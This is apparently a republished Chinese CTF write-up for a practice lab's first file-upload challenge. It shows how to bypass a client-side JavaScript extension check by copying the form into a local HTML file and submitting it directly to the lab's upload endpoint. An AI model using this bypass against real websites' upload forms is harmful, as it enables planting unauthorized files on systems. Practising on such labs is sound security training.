hackinglab上传关第一题

Posted 2020-10-29 kog-maw

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了hackinglab上传关第一题相关的知识，希望对你有一定的参考价值。

请上传一张jpg格式的图片分值: 100

只能上传jpg格式的图片哦~！
通关地址

看源码，js做的文件后缀验证，极端不安全。由于我没有开brupsuit，所以将源代码复制到本地，新建一个html，内容如下：

<html>
	<head>
		<meta http-equiv=Content-Type content="text/html;charset=utf-8">
		<title>upload 1</title>
	</head>
	<body>
		请上传一张JPG格式的图片！
		<form action="http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/upload_file.php" method="post" enctype="multipart/form-data">
			<label for="file">文件名</label>
			<input type="file" name="file" id="file" /> 
			<br />
			<input type="submit" name="submit" value="上传" />
		</form>
	</body>
</html>
<!--在form的action那里需要将url改为绝对路径，否则会失败-->

去掉js检查，浏览器打开这个html提交，get flag success :)

以上是关于hackinglab上传关第一题的主要内容，如果未能解决你的问题，请参考以下文章

XSS Challenges练习方法

第一题代码

java Ftp上传创建多层文件的代码片段

leetcode第一题